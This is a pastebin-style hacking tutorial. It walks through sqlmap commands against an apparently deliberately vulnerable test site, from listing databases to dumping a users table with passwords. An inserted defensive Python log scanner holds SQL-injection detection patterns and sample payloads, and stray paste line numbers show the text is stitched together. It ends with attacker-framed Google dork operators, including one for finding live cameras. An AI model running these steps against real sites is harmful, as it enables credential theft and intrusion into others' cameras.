Mukezh

Session SQL Map

Apr 2nd, 2019

SQLMAP
=======
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches, from database fingerprinting, through fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Step 1: Open your Linux terminal

Step 2: python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" --dbs

Here we can see that we got the databases below.
[09:54:16] [INFO] fetching database names
available databases [2]:
[*] acuart <------- Target Database
[*] information_schema

Step 3: Get the tables of the database

python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -D acuart --tables
Here we got all the tables available in the acuart database.
[09:58:49] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |-------> Target Table
+-----------+

Step 4: Get the columns of the users table
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -T users --columns

Output:
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |---> Target
| phone   | varchar(100) |
| uname   | varchar(100) |---> Target
+---------+--------------+

Step 5: Get the data from the columns of the above table.
python sqlmap.py -u "http://testphp.vulnweb.com/search.php?test=query" -U test -T users --dump

Output:
Database: acuart
Table: users
[1 entry]
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| cc                        | name         | cart                             | pass | uname | phone   | email              | address |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
| De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test  | 2323345 | jurandir@gmail.com | foda-se |
+---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
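
Seen from the defender's side, the enumeration steps above leave recognisable traces in web server access logs. The following Python code is an added example, not part of the original paste or of sqlmap: it scans combined-format log lines for sqlmap's default User-Agent and for the information_schema metadata queries that database, table and column enumeration issue against a MySQL backend. The log lines are constructed, and the analyze function and the pattern list are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Combined-log-format lines, constructed for this example (not captured traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Apr/2019:09:54:10 +0000] "GET /search.php?test=query HTTP/1.1" 200 4958 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.8 - - [02/Apr/2019:09:54:12 +0000] "GET /search.php?test=credit+union HTTP/1.1" 200 4958 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [02/Apr/2019:09:54:16 +0000] "GET /search.php?test=query%27%20UNION%20ALL%20SELECT%20schema_name%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20- HTTP/1.1" 200 5120 "-" "sqlmap/1.3#stable (http://sqlmap.org)"
203.0.113.9 - - [02/Apr/2019:09:58:49 +0000] "GET /search.php?test=query%27%20UNION%20ALL%20SELECT%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES--%20- HTTP/1.1" 200 5301 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# MySQL metadata tables read during enumeration, mapped to the tutorial's
# steps (assumed mapping for a MySQL >= 5 backend).
STAGES = [
    ("database enumeration (--dbs)", re.compile(r"information_schema\.schemata", re.I)),
    ("table enumeration (--tables)", re.compile(r"information_schema\.tables", re.I)),
    ("column enumeration (--columns)", re.compile(r"information_schema\.columns", re.I)),
]
# Generic SQL syntax that has no business inside a search term.
INJECTION_RE = re.compile(r"\bunion\b.+\bselect\b|\bor\b\s+\d+=\d+|sleep\(\d+\)", re.I)

def analyze(log_text):
    """Return findings as dicts with ip, ts and the list of reasons the line was flagged."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Decode the query string first: payloads arrive URL-encoded.
        query = unquote_plus(urlsplit(m["target"]).query)
        reasons = []
        if m["ua"].lower().startswith("sqlmap/"):
            reasons.append("sqlmap default User-Agent")
        reasons += [name for name, rx in STAGES if rx.search(query)]
        if INJECTION_RE.search(query):
            reasons.append("SQL syntax in parameter")
        if reasons:
            findings.append({"ip": m["ip"], "ts": m["ts"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f["ts"], f["ip"], "; ".join(f["reasons"]))
```

The User-Agent header is client-controlled, so the payload checks are what catch the last sample line, which carries a browser User-Agent.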
  65.  
  66.  
  67.  
  68. =x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
  69.  
  70.  
GOOGLE DORKING
================
Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That includes information that is not intended for public viewing but has not been adequately protected. Hackers use Google dorking to extract exactly the data they want.

DORKS COMMANDS
=================

= intitle : This allows an attacker to search for pages with specific text in their HTML title. So intitle: “login page” will help a hacker find pages titled “login page”.
= inurl : This allows a hacker to search for pages based on the text contained in the URL, e.g. “inurl : login.php”.
= intext : This operator searches the entire content of a given page for keywords supplied by the attacker.
= site : Limits the scope of a query to a single website.
= cache : This shows the attacker the cached (previously stored) version of a website.
= filetype : This helps an attacker narrow results to the file type/extension of the particular file he/she is searching for.
= indexof : This helps in finding the whole index of files that a website stores and leaves open to browse.

= Finding live cameras - (inurl = “/view/view.shtml?id-”): the results will include live cameras made by the Axis company.


Google Hacking Database (GHDB) -> https://www.exploit-db.com/google-hacking-database/


=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x